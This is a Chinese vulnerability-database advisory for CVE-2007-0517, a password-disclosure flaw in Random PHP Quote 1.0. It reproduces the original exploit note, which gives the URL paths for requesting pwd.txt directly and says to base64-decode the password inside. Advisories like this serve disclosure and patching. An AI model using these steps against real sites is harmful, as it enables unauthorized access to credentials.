RANDOM PHP QUOTE 'pwd.txt' 远程密码信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1191974 漏洞类型 未知
发布时间 2007-01-25 更新时间 2007-01-25
CVE编号 CVE-2007-0517 CNNVD-ID CNNVD-200701-430
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://www.securityfocus.com/bid/86713
https://cxsecurity.com/issue/WLB-2007010099
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-430
|漏洞详情
ScriptsezRandomPHPQuote1.0在web根下储存敏感信息而未赋予足够的访问限制,这使得远程攻击者可以借助一个对pwd.txt的直接请求,获得密码信息。
|漏洞EXP
########################################################################
#############
#RANDOM PHP QUOTE 1.0 (pwd.txt) Remote Password Disclosur
########################################################################
#############
#
#scrip : http://www.scriptsez.net/download/download.php?action=download&p=random_
php_quote.zip&ns=1
#
#
#discovered by : ThE TiGeR 100
#
########################################################################
#############
#Exploit : 
#
#http://www.site.com/[path]/pwd.txt
#or
#http://www.site.com/pwd.txt 
#
#then crack the password with bass64 decode 
########################################################################
#############
#
#Contact:the.tiger100 (at) gmail (dot) com [email concealed]
#
#
#GreetZ to str0k ;)
#
#                 Your Time is UpMy Time Is Now,
#                 You Can't See Me My Time Is Now
########################################################################
#############
|受影响的产品
Scriptsez Random Php Quote 1.0
|参考资料

来源:BUGTRAQ
名称:20070123RANDOMPHPQUOTE1.0(pwd.txt)RemotePasswordDisclosur
链接:http://www.securityfocus.com/archive/1/archive/1/457825/100/0/threaded
来源:OSVDB
名称:32947
链接:http://osvdb.org/32947
来源:XF
名称:randomphpquote-pwd-information-disclosure(31696)
链接:http://xforce.iss.net/xforce/xfdb/31696
来源:SREASON
名称:2184
链接:http://securityreason.com/securityalert/2184
来源:SECUNIA
名称:23888
链接:http://secunia.com/advisories/23888